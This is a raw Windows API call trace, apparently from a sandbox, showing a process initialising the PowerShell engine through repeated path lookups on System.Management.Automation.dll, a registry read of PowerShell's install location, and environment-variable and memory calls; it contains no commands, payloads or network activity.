	[0432.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.253] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.254] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d000, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.255] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.255] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d6b8 | out: phkResult=0x24d6b8*=0x348) returned 0x0
	[0432.255] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d63c, lpData=0x0, lpcbData=0x24d638*=0x0 | out: lpType=0x24d63c*=0x1, lpData=0x0, lpcbData=0x24d638*=0x56) returned 0x0
	[0432.255] CoTaskMemAlloc (cb=0x5a) returned 0x432670
	[0432.255] RegQueryValueExW (in: hKey=0x348, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d60c, lpData=0x432670, lpcbData=0x24d608*=0x56 | out: lpType=0x24d60c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24d608*=0x56) returned 0x0
	[0432.255] CoTaskMemFree (pv=0x432670) 
	[0432.255] RegCloseKey (hKey=0x348) returned 0x0
	[0432.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d120, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d070, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d0c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.256] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24d010, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.257] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.257] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.257] CoTaskMemFree (pv=0x49d6c0) 
	[0432.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.257] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.258] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.259] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.260] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.261] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.262] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.263] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c050, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.264] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c100, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.265] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24c090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0432.293] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.294] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.294] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.294] CoTaskMemFree (pv=0x49d6c0) 
	[0432.390] VirtualQuery (in: lpAddress=0x24b710, lpBuffer=0x24c5d0, dwLength=0x30 | out: lpBuffer=0x24c5d0*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0432.392] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.392] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.392] CoTaskMemFree (pv=0x49d6c0) 
	[0432.393] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.393] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0432.393] CoTaskMemFree (pv=0x49d6c0) 
	[0432.393] CoTaskMemAlloc (cb=0x104) returned 0x49d6c0
	[0432.393] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x49d6c0, nSize=0x80 | out: lpBuffer="") returned 0x0
